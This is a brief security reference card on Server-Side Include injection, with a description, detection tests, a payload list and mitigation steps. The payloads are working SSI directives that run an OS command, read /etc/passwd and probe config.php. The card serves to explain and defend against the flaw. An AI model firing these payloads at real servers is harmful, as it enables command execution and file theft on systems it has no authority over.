High Severity | OWASP A03:2021
🟠 Server-Side Include (SSI) Injection
🧠 Description
SSI Injection occurs when web applications use Server-Side Include directives in HTML pages without proper input validation. Attackers can inject SSI directives to execute OS commands or access files.
Impact: RCE, File Access, Information Disclosure
🔍 Detection
- Test:
<!--#exec cmd="whoami"--> - Test:
<!--#include virtual="/etc/passwd"--> - Test:
<!--#echo var="DATE_LOCAL"-->
💣 Payloads
<!--#exec cmd="whoami" -->
<!--#include virtual="/etc/passwd" -->
<!--#echo var="DATE_LOCAL" -->
<!--#fsize file="config.php" -->
🛡️ Mitigation
✅ Disable SSI in web server
✅ Validate and sanitize all user input
✅ Use allowlist for file includes
✅ Validate and sanitize all user input
✅ Use allowlist for file includes